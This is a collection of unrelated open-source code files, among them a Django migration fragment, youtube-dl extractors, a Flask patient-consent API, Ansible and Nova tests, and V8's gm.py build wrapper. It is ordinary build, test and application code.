'line_desc': ('django.db.models.fields.CharField', [], {'default': "'Misc. Item'", 'max_length': '1024'}),
'list_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '30', 'decimal_places': '2'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'refund_requested_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'report_comments': ('django.db.models.fields.TextField', [], {'default': "''"}),
'service_fee': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32', 'db_index': 'True'}),
'unit_cost': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.paidcourseregistration': {
'Meta': {'object_name': 'PaidCourseRegistration', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']", 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.paidcourseregistrationannotation': {
'Meta': {'object_name': 'PaidCourseRegistrationAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.registrationcoderedemption': {
'Meta': {'object_name': 'RegistrationCodeRedemption'},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']", 'null': 'True'}),
'redeemed_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)', 'null': 'True'}),
'redeemed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'registration_code': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCode']"})
},
'student.courseenrollment': {
'Meta': {'ordering': "('user', 'course_id')", 'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['shoppingcart']
| agpl-3.0 |
gitcoinco/web | app/dashboard/tests/test_bounty_state.py | 1 | 2398 | # -*- coding: utf-8 -*-
"""Test BountyState and BountyEvent interactions and FSM
Copyright (C) 2021 Gitcoin Core
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from datetime import timedelta
from django.utils import timezone
from dashboard.models import Bounty, BountyEvent
from test_plus.test import TestCase
class BountyStateTest(TestCase):
"""Define tests for bounty states and events."""
def setUp(self):
self.bounty = Bounty.objects.create(
title='foo',
project_type='traditional',
value_in_token=3,
token_name='USDT',
web3_created=timezone.now() - timedelta(days=7),
github_url='https://github.com/danlipert/gitcoin-test/issues/1',
token_address='0x0',
issue_description='hello world',
bounty_owner_github_username='example',
is_open=True,
accepted=True,
expires_date=timezone.now() + timedelta(days=1, hours=1),
idx_project_length=5,
project_length='Months',
bounty_type='Feature',
experience_level='Intermediate',
raw_data={},
idx_status='open',
bounty_owner_email='asdfasdf@bar.com',
current_bounty=True,
bounty_state='open'
)
def test_handle_event(self):
event = BountyEvent.objects.create(
bounty=self.bounty,
event_type='express_interest'
)
self.bounty.handle_event(event)
assert self.bounty.bounty_state == 'open'
event_accept = BountyEvent.objects.create(
bounty=self.bounty,
event_type='accept_worker'
)
self.bounty.handle_event(event_accept)
assert self.bounty.bounty_state == 'work_started'
| agpl-3.0 |
Manuel4131/youtube-dl | youtube_dl/extractor/tumblr.py | 79 | 3285 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from .common import InfoExtractor
class TumblrIE(InfoExtractor):
_VALID_URL = r'http://(?P<blog_name>.*?)\.tumblr\.com/(?:post|video)/(?P<id>[0-9]+)(?:$|[/?#])'
_TESTS = [{
'url': 'http://tatianamaslanydaily.tumblr.com/post/54196191430/orphan-black-dvd-extra-behind-the-scenes',
'md5': '479bb068e5b16462f5176a6828829767',
'info_dict': {
'id': '54196191430',
'ext': 'mp4',
'title': 'tatiana maslany news, Orphan Black || DVD extra - behind the scenes ↳...',
'description': 'md5:37db8211e40b50c7c44e95da14f630b7',
'thumbnail': 're:http://.*\.jpg',
}
}, {
'url': 'http://5sostrum.tumblr.com/post/90208453769/yall-forgetting-the-greatest-keek-of-them-all',
'md5': 'bf348ef8c0ef84fbf1cbd6fa6e000359',
'info_dict': {
'id': '90208453769',
'ext': 'mp4',
'title': '5SOS STRUM ;]',
'description': 'md5:dba62ac8639482759c8eb10ce474586a',
'thumbnail': 're:http://.*\.jpg',
}
}, {
'url': 'http://naked-yogi.tumblr.com/post/118312946248/naked-smoking-stretching',
'md5': 'de07e5211d60d4f3a2c3df757ea9f6ab',
'info_dict': {
'id': 'Wmur',
'ext': 'mp4',
'title': 'naked smoking & stretching',
'upload_date': '20150506',
'timestamp': 1430931613,
},
'add_ie': ['Vidme'],
}, {
'url': 'http://camdamage.tumblr.com/post/98846056295/',
'md5': 'a9e0c8371ea1ca306d6554e3fecf50b6',
'info_dict': {
'id': '105463834',
'ext': 'mp4',
'title': 'Cam Damage-HD 720p',
'uploader': 'John Moyer',
'uploader_id': 'user32021558',
},
'add_ie': ['Vimeo'],
}]
def _real_extract(self, url):
m_url = re.match(self._VALID_URL, url)
video_id = m_url.group('id')
blog = m_url.group('blog_name')
url = 'http://%s.tumblr.com/post/%s/' % (blog, video_id)
webpage, urlh = self._download_webpage_handle(url, video_id)
iframe_url = self._search_regex(
r'src=\'(https?://www\.tumblr\.com/video/[^\']+)\'',
webpage, 'iframe url', default=None)
if iframe_url is None:
return self.url_result(urlh.geturl(), 'Generic')
iframe = self._download_webpage(iframe_url, video_id,
'Downloading iframe page')
video_url = self._search_regex(r'<source src="([^"]+)"',
iframe, 'video url')
# The only place where you can get a title, it's not complete,
# but searching in other places doesn't work for all videos
video_title = self._html_search_regex(
r'(?s)<title>(?P<title>.*?)(?: \| Tumblr)?</title>',
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'ext': 'mp4',
'title': video_title,
'description': self._og_search_description(webpage, default=None),
'thumbnail': self._og_search_thumbnail(webpage, default=None),
}
| unlicense |
uzh/msregistry | app/api_1_0/user.py | 1 | 4643 | # Copyright (C) 2016 University of Zurich. All rights reserved.
#
# This file is part of MSRegistry Backend.
#
# MSRegistry Backend is free software: you can redistribute it and/or
# modify it under the terms of the version 3 of the GNU Affero General
# Public License as published by the Free Software Foundation, or any
# other later version.
#
# MSRegistry Backend is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the version
# 3 of the GNU Affero General Public License for more details.
#
# You should have received a copy of the version 3 of the GNU Affero
# General Public License along with MSRegistry Backend. If not, see
# <http://www.gnu.org/licenses/>.
__author__ = "Filippo Panessa <filippo.panessa@uzh.ch>"
__copyright__ = ("Copyright (c) 2016 S3IT, Zentrale Informatik,"
" University of Zurich")
from flask import jsonify, request
from flask import _app_ctx_stack as stack
from . import api
from app.models.user import User
from app.models.role import Role
from app import db
from app.auth.decorators import requires_auth, requires_roles
from app.exceptions import UserNotFound, MethodNotAllowed
from jsonschema import validate, ValidationError
from app import inputs
from app import utils
@api.route('/user')
@requires_auth
def get_user():
user = User()
result = user.getByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(result.serialize())
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent', methods=['GET'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def get_user_consent_info():
user = User()
result = user.getUserConsentByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(accepted=bool(result))
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent/info', methods=['GET'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def get_user_consent():
user = User()
result = user.getByUniqueID(stack.top.uniqueID)
if result is not None:
return jsonify(result.serialize(stack.top.roles))
raise UserNotFound(stack.top.uniqueID)
@api.route('/user/consent', methods=['POST'])
@requires_auth
@requires_roles(roles=[Role.patient, Role.relative])
def set_user_consent():
user = User()
consent = request.get_json(silent=True, force=True)
if Role.relative in stack.top.roles:
try:
validate(consent, inputs.user_consent_relative)
except ValidationError as error:
raise MethodNotAllowed(error.message)
try:
return jsonify(success=bool(user.setRelativeConsentByUniqueID(uniqueID=stack.top.uniqueID,
sex=consent['sex'],
birthdate=utils.Time.DMYToDatetime(consent['birthdate']),
signature=consent['signature'])))
except ValueError as error:
raise MethodNotAllowed(error.message)
except db.BadValueException as error:
raise MethodNotAllowed(error.message)
if Role.patient in stack.top.roles:
try:
validate(consent, inputs.user_consent_patient)
except ValidationError as error:
raise MethodNotAllowed(error.message)
try:
return jsonify(success=bool(user.setPatientConsentByUniqueID(uniqueID=stack.top.uniqueID,
sex=consent['sex'], birthdate=utils.Time.DMYToDatetime(consent['birthdate']),
signature=consent['signature'],
physician_contact_permitted=consent['physician_contact_permitted'],
medical_record_abstraction=consent['medical_record_abstraction'],
data_exchange_cohort=consent['data_exchange_cohort'])))
except ValueError as error:
raise MethodNotAllowed(error.message)
except db.BadValueException as error:
raise MethodNotAllowed(error.message)
else:
raise MethodNotAllowed('Bad value for field of type "roles". Reason: "Value cannot be null"')
| agpl-3.0 |
TinEye/tineyeservices_python | tineyeservices/image.py | 1 | 1973 | # -*- coding: utf-8 -*-
# Copyright (c) 2018 TinEye. All rights reserved worldwide.
import contextlib
import os
class Image(object):
"""
Class representing an image.
Image on filesystem:
>>> from tineyeservices import Image
>>> image = Image(filepath='/path/to/image.jpg', collection_filepath='collection.jpg')
Image URL:
>>> image = Image(url='https://tineye.com/images/meloncat.jpg', collection_filepath='collection.jpg')
Image with metadata:
>>> import json
>>> metadata = json.dumps({"keywords": ["dolphin"]})
>>> image = Image(filepath='/path/to/image.jpg', metadata=metadata)
"""
def __init__(self, filepath='', url='', collection_filepath='', metadata=None):
self.data = None
self.filepath = filepath
self.url = url
self.collection_filepath = ''
# If a filepath is specified, read the image and use that as the collection filepath
if filepath != '':
with contextlib.closing(open(filepath, 'rb')) as fp:
self.data = fp.read()
self.collection_filepath = filepath
# If no filepath but a URL is specified, use the basename of the URL
# as the collection filepath
self.url = url
if self.data is None and self.url != '':
self.collection_filepath = os.path.basename(self.url)
# If user specified their own filepath, then use that instead
if collection_filepath != '':
self.collection_filepath = collection_filepath
# Need to make sure there is at least data or a URL
if self.data is None and self.url == '':
raise ValueError('Image object needs either data or a URL.')
self.metadata = metadata
def __repr__(self):
return "Image(filepath=%r, url=%r, collection_filepath=%r, metadata=%r)" %\
(self.filepath, self.url, self.collection_filepath, self.metadata)
| mit |
svenstaro/ansible | test/units/modules/network/ios/test_ios_command.py | 59 | 4059 | # (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.ios import ios_command
from .ios_module import TestIosModule, load_fixture, set_module_args
class TestIosCommandModule(TestIosModule):
module = ios_command
def setUp(self):
self.mock_run_commands = patch('ansible.modules.network.ios.ios_command.run_commands')
self.run_commands = self.mock_run_commands.start()
def tearDown(self):
self.mock_run_commands.stop()
def load_fixtures(self, commands=None):
def load_from_file(*args, **kwargs):
module, commands = args
output = list()
for item in commands:
try:
obj = json.loads(item['command'])
command = obj['command']
except ValueError:
command = item['command']
filename = str(command).replace(' ', '_')
output.append(load_fixture(filename))
return output
self.run_commands.side_effect = load_from_file
def test_ios_command_simple(self):
set_module_args(dict(commands=['show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 1)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_multiple(self):
set_module_args(dict(commands=['show version', 'show version']))
result = self.execute_module()
self.assertEqual(len(result['stdout']), 2)
self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))
def test_ios_command_wait_for(self):
wait_for = 'result[0] contains "Cisco IOS"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module()
def test_ios_command_wait_for_fails(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 10)
def test_ios_command_retries(self):
wait_for = 'result[0] contains "test string"'
set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
self.execute_module(failed=True)
self.assertEqual(self.run_commands.call_count, 2)
def test_ios_command_match_any(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
self.execute_module()
def test_ios_command_match_all(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "IOSv Software"']
set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
self.execute_module()
def test_ios_command_match_all_failure(self):
wait_for = ['result[0] contains "Cisco IOS"',
'result[0] contains "test string"']
commands = ['show version', 'show version']
set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
self.execute_module(failed=True)
| gpl-3.0 |
weolar/miniblink49 | v8_7_5/tools/dev/gm.py | 3 | 13334 | #!/usr/bin/env python
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""\
Convenience wrapper for compiling V8 with gn/ninja and running tests.
Sets up build output directories if they don't exist.
Produces simulator builds for non-Intel target architectures.
Uses Goma by default if it is detected (at output directory setup time).
Expects to be run from the root of a V8 checkout.
Usage:
gm.py [<arch>].[<mode>[-<suffix>]].[<target>] [testname...]
All arguments are optional. Most combinations should work, e.g.:
gm.py ia32.debug x64.release x64.release-my-custom-opts d8
gm.py android_arm.release.check
gm.py x64 mjsunit/foo cctest/test-bar/*
"""
# See HELP below for additional documentation.
from __future__ import print_function
import errno
import os
import re
import subprocess
import sys
USE_PTY = "linux" in sys.platform
if USE_PTY:
import pty
BUILD_TARGETS_TEST = ["d8", "cctest", "unittests"]
BUILD_TARGETS_ALL = ["all"]
# All arches that this script understands.
ARCHES = ["ia32", "x64", "arm", "arm64", "mipsel", "mips64el", "ppc", "ppc64",
"s390", "s390x", "android_arm", "android_arm64"]
# Arches that get built/run when you don't specify any.
DEFAULT_ARCHES = ["ia32", "x64", "arm", "arm64"]
# Modes that this script understands.
MODES = ["release", "debug", "optdebug"]
# Modes that get built/run when you don't specify any.
DEFAULT_MODES = ["release", "debug"]
# Build targets that can be manually specified.
TARGETS = ["d8", "cctest", "unittests", "v8_fuzzers", "mkgrokdump",
"generate-bytecode-expectations", "inspector-test"]
# Build targets that get built when you don't specify any (and specified tests
# don't imply any other targets).
DEFAULT_TARGETS = ["d8"]
# Tests that run-tests.py would run by default that can be run with
# BUILD_TARGETS_TESTS.
DEFAULT_TESTS = ["cctest", "debugger", "intl", "message", "mjsunit",
"preparser", "unittests"]
# These can be suffixed to any <arch>.<mode> combo, or used standalone,
# or used as global modifiers (affecting all <arch>.<mode> combos).
ACTIONS = {
"all": {"targets": BUILD_TARGETS_ALL, "tests": []},
"tests": {"targets": BUILD_TARGETS_TEST, "tests": []},
"check": {"targets": BUILD_TARGETS_TEST, "tests": DEFAULT_TESTS},
"checkall": {"targets": BUILD_TARGETS_ALL, "tests": ["ALL"]},
}
HELP = """<arch> can be any of: %(arches)s
<mode> can be any of: %(modes)s
<target> can be any of:
- cctest, d8, unittests, v8_fuzzers (build respective binary)
- all (build all binaries)
- tests (build test binaries)
- check (build test binaries, run most tests)
- checkall (build all binaries, run more tests)
""" % {"arches": " ".join(ARCHES),
"modes": " ".join(MODES)}
TESTSUITES_TARGETS = {"benchmarks": "d8",
"cctest": "cctest",
"debugger": "d8",
"fuzzer": "v8_fuzzers",
"inspector": "inspector-test",
"intl": "d8",
"message": "d8",
"mjsunit": "d8",
"mozilla": "d8",
"preparser": "d8",
"test262": "d8",
"unittests": "unittests",
"webkit": "d8"}
OUTDIR = "out"
def DetectGoma():
home_goma = os.path.expanduser("~/goma")
if os.path.exists(home_goma):
return home_goma
if os.environ.get("GOMA_DIR"):
return os.environ.get("GOMA_DIR")
if os.environ.get("GOMADIR"):
return os.environ.get("GOMADIR")
return None
GOMADIR = DetectGoma()
IS_GOMA_MACHINE = GOMADIR is not None
USE_GOMA = "true" if IS_GOMA_MACHINE else "false"
RELEASE_ARGS_TEMPLATE = """\
is_component_build = false
is_debug = false
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_disassembler = true
v8_enable_object_print = true
v8_enable_verify_heap = true
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
DEBUG_ARGS_TEMPLATE = """\
is_component_build = true
is_debug = true
symbol_level = 2
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_fast_mksnapshot = true
v8_enable_slow_dchecks = true
v8_optimized_debug = false
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
OPTDEBUG_ARGS_TEMPLATE = """\
is_component_build = true
is_debug = true
symbol_level = 1
%s
use_goma = {GOMA}
goma_dir = \"{GOMA_DIR}\"
v8_enable_backtrace = true
v8_enable_fast_mksnapshot = true
v8_enable_verify_heap = true
v8_optimized_debug = true
""".replace("{GOMA}", USE_GOMA).replace("{GOMA_DIR}", str(GOMADIR))
ARGS_TEMPLATES = {
"release": RELEASE_ARGS_TEMPLATE,
"debug": DEBUG_ARGS_TEMPLATE,
"optdebug": OPTDEBUG_ARGS_TEMPLATE
}
def PrintHelpAndExit():
print(__doc__)
print(HELP)
sys.exit(0)
def _Call(cmd, silent=False):
if not silent: print("# %s" % cmd)
return subprocess.call(cmd, shell=True)
def _CallWithOutputNoTerminal(cmd):
return subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
def _CallWithOutput(cmd):
print("# %s" % cmd)
# The following trickery is required so that the 'cmd' thinks it's running
# in a real terminal, while this script gets to intercept its output.
master, slave = pty.openpty()
p = subprocess.Popen(cmd, shell=True, stdin=slave, stdout=slave, stderr=slave)
os.close(slave)
output = []
try:
while True:
try:
data = os.read(master, 512)
except OSError as e:
if e.errno != errno.EIO: raise
break # EIO means EOF on some systems
else:
if not data: # EOF
break
print(data, end="")
sys.stdout.flush()
output.append(data)
finally:
os.close(master)
p.wait()
return p.returncode, "".join(output)
def _Which(cmd):
for path in os.environ["PATH"].split(os.pathsep):
if os.path.exists(os.path.join(path, cmd)):
return os.path.join(path, cmd)
return None
def _Write(filename, content):
print("# echo > %s << EOF\n%sEOF" % (filename, content))
with open(filename, "w") as f:
f.write(content)
def _Notify(summary, body):
if _Which('notify-send') is not None:
_Call("notify-send '{}' '{}'".format(summary, body), silent=True)
else:
print("{} - {}".format(summary, body))
def GetPath(arch, mode):
subdir = "%s.%s" % (arch, mode)
return os.path.join(OUTDIR, subdir)
def PrepareMksnapshotCmdline(orig_cmdline, path):
result = "gdb --args %s/mksnapshot " % path
for w in orig_cmdline.split(" "):
if w.startswith("gen/") or w.startswith("snapshot_blob"):
result += ("%(path)s%(sep)s%(arg)s " %
{"path": path, "sep": os.sep, "arg": w})
else:
result += "%s " % w
return result
class Config(object):
def __init__(self, arch, mode, targets, tests=[]):
self.arch = arch
self.mode = mode
self.targets = set(targets)
self.tests = set(tests)
def Extend(self, targets, tests=[]):
self.targets.update(targets)
self.tests.update(tests)
def GetTargetCpu(self):
if self.arch == "android_arm": return "target_cpu = \"arm\""
if self.arch == "android_arm64": return "target_cpu = \"arm64\""
cpu = "x86"
if "64" in self.arch or self.arch == "s390x":
cpu = "x64"
return "target_cpu = \"%s\"" % cpu
def GetV8TargetCpu(self):
if self.arch == "android_arm": return "\nv8_target_cpu = \"arm\""
if self.arch == "android_arm64": return "\nv8_target_cpu = \"arm64\""
if self.arch in ("arm", "arm64", "mipsel", "mips64el", "ppc", "ppc64",
"s390", "s390x"):
return "\nv8_target_cpu = \"%s\"" % self.arch
return ""
def GetTargetOS(self):
if self.arch in ("android_arm", "android_arm64"):
return "\ntarget_os = \"android\""
return ""
def GetGnArgs(self):
# Use only substring before first '-' as the actual mode
mode = re.match("([^-]+)", self.mode).group(1)
template = ARGS_TEMPLATES[mode]
arch_specific = (self.GetTargetCpu() + self.GetV8TargetCpu() +
self.GetTargetOS())
return template % arch_specific
def Build(self):
path = GetPath(self.arch, self.mode)
args_gn = os.path.join(path, "args.gn")
build_ninja = os.path.join(path, "build.ninja")
if not os.path.exists(path):
print("# mkdir -p %s" % path)
os.makedirs(path)
if not os.path.exists(args_gn):
_Write(args_gn, self.GetGnArgs())
if not os.path.exists(build_ninja):
code = _Call("gn gen %s" % path)
if code != 0: return code
targets = " ".join(self.targets)
# The implementation of mksnapshot failure detection relies on
# the "pty" module and GDB presence, so skip it on non-Linux.
if not USE_PTY:
return _Call("autoninja -C %s %s" % (path, targets))
return_code, output = _CallWithOutput("autoninja -C %s %s" %
(path, targets))
if return_code != 0 and "FAILED:" in output and "snapshot_blob" in output:
csa_trap = re.compile("Specify option( --csa-trap-on-node=[^ ]*)")
match = csa_trap.search(output)
extra_opt = match.group(1) if match else ""
cmdline = re.compile("python ../../tools/run.py ./mksnapshot (.*)")
orig_cmdline = cmdline.search(output).group(1).strip()
cmdline = PrepareMksnapshotCmdline(orig_cmdline, path) + extra_opt
_Notify("V8 build requires your attention",
"Detected mksnapshot failure, re-running in GDB...")
_Call(cmdline)
return return_code
def RunTests(self):
if not self.tests: return 0
if "ALL" in self.tests:
tests = ""
else:
tests = " ".join(self.tests)
return _Call('"%s" ' % sys.executable +
os.path.join("tools", "run-tests.py") +
" --outdir=%s %s" % (GetPath(self.arch, self.mode), tests))
def GetTestBinary(argstring):
for suite in TESTSUITES_TARGETS:
if argstring.startswith(suite): return TESTSUITES_TARGETS[suite]
return None
class ArgumentParser(object):
def __init__(self):
self.global_targets = set()
self.global_tests = set()
self.global_actions = set()
self.configs = {}
def PopulateConfigs(self, arches, modes, targets, tests):
for a in arches:
for m in modes:
path = GetPath(a, m)
if path not in self.configs:
self.configs[path] = Config(a, m, targets, tests)
else:
self.configs[path].Extend(targets, tests)
def ProcessGlobalActions(self):
have_configs = len(self.configs) > 0
for action in self.global_actions:
impact = ACTIONS[action]
if (have_configs):
for c in self.configs:
self.configs[c].Extend(**impact)
else:
self.PopulateConfigs(DEFAULT_ARCHES, DEFAULT_MODES, **impact)
def ParseArg(self, argstring):
if argstring in ("-h", "--help", "help"):
PrintHelpAndExit()
arches = []
modes = []
targets = []
actions = []
tests = []
# Specifying a single unit test looks like "unittests/Foo.Bar".
if argstring.startswith("unittests/"):
words = [argstring]
else:
words = argstring.split('.')
if len(words) == 1:
word = words[0]
if word in ACTIONS:
self.global_actions.add(word)
return
if word in TARGETS:
self.global_targets.add(word)
return
maybe_target = GetTestBinary(word)
if maybe_target is not None:
self.global_tests.add(word)
self.global_targets.add(maybe_target)
return
for word in words:
if word in ARCHES:
arches.append(word)
elif word in MODES:
modes.append(word)
elif word in TARGETS:
targets.append(word)
elif word in ACTIONS:
actions.append(word)
elif any(map(lambda x: word.startswith(x + "-"), MODES)):
modes.append(word)
else:
print("Didn't understand: %s" % word)
sys.exit(1)
# Process actions.
for action in actions:
impact = ACTIONS[action]
targets += impact["targets"]
tests += impact["tests"]
# Fill in defaults for things that weren't specified.
arches = arches or DEFAULT_ARCHES
modes = modes or DEFAULT_MODES
targets = targets or DEFAULT_TARGETS
# Produce configs.
self.PopulateConfigs(arches, modes, targets, tests)
def ParseArguments(self, argv):
if len(argv) == 0:
PrintHelpAndExit()
for argstring in argv:
self.ParseArg(argstring)
self.ProcessGlobalActions()
for c in self.configs:
self.configs[c].Extend(self.global_targets, self.global_tests)
return self.configs
def Main(argv):
parser = ArgumentParser()
configs = parser.ParseArguments(argv[1:])
return_code = 0
# If we have Goma but it is not running, start it.
if (GOMADIR is not None and
_Call("ps -e | grep compiler_proxy > /dev/null", silent=True) != 0):
_Call("%s/goma_ctl.py ensure_start" % GOMADIR)
for c in configs:
return_code += configs[c].Build()
if return_code == 0:
for c in configs:
return_code += configs[c].RunTests()
if return_code == 0:
_Notify('Done!', 'V8 compilation finished successfully.')
else:
_Notify('Error!', 'V8 compilation finished with errors.')
return return_code
if __name__ == "__main__":
sys.exit(Main(sys.argv))
| apache-2.0 |
shhui/nova | nova/tests/virt/baremetal/db/base.py | 53 | 1689 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Bare-metal DB test base class."""
from oslo.config import cfg
from nova import context as nova_context
from nova import test
from nova.virt.baremetal.db import migration as bm_migration
from nova.virt.baremetal.db.sqlalchemy import session as bm_session
_DB_CACHE = None
CONF = cfg.CONF
CONF.import_opt('sql_connection',
'nova.virt.baremetal.db.sqlalchemy.session',
group='baremetal')
class Database(test.Database):
def post_migrations(self):
pass
class BMDBTestCase(test.TestCase):
def setUp(self):
super(BMDBTestCase, self).setUp()
self.flags(sql_connection='sqlite://', group='baremetal')
global _DB_CACHE
if not _DB_CACHE:
_DB_CACHE = Database(bm_session, bm_migration,
sql_connection=CONF.baremetal.sql_connection,
sqlite_db=None,
sqlite_clean_db=None)
self.useFixture(_DB_CACHE)
self.context = nova_context.get_admin_context()
| apache-2.0 |
epitron/youtube-dl | youtube_dl/extractor/ndr.py | 17 | 14346 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
int_or_none,
parse_iso8601,
qualities,
)
class NDRBaseIE(InfoExtractor):
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
display_id = next(group for group in mobj.groups() if group)
webpage = self._download_webpage(url, display_id)
return self._extract_embed(webpage, display_id)
class NDRIE(NDRBaseIE):
IE_NAME = 'ndr'
IE_DESC = 'NDR.de - Norddeutscher Rundfunk'
_VALID_URL = r'https?://(?:www\.)?ndr\.de/(?:[^/]+/)*(?P<id>[^/?#]+),[\da-z]+\.html'
_TESTS = [{
# httpVideo, same content id
'url': 'http://www.ndr.de/fernsehen/Party-Poette-und-Parade,hafengeburtstag988.html',
'md5': '6515bc255dc5c5f8c85bbc38e035a659',
'info_dict': {
'id': 'hafengeburtstag988',
'display_id': 'Party-Poette-und-Parade',
'ext': 'mp4',
'title': 'Party, Pötte und Parade',
'description': 'md5:ad14f9d2f91d3040b6930c697e5f6b4c',
'uploader': 'ndrtv',
'timestamp': 1431108900,
'upload_date': '20150510',
'duration': 3498,
},
'params': {
'skip_download': True,
},
}, {
# httpVideo, different content id
'url': 'http://www.ndr.de/sport/fussball/40-Osnabrueck-spielt-sich-in-einen-Rausch,osna270.html',
'md5': '1043ff203eab307f0c51702ec49e9a71',
'info_dict': {
'id': 'osna272',
'display_id': '40-Osnabrueck-spielt-sich-in-einen-Rausch',
'ext': 'mp4',
'title': 'Osnabrück - Wehen Wiesbaden: Die Highlights',
'description': 'md5:32e9b800b3d2d4008103752682d5dc01',
'uploader': 'ndrtv',
'timestamp': 1442059200,
'upload_date': '20150912',
'duration': 510,
},
'params': {
'skip_download': True,
},
}, {
# httpAudio, same content id
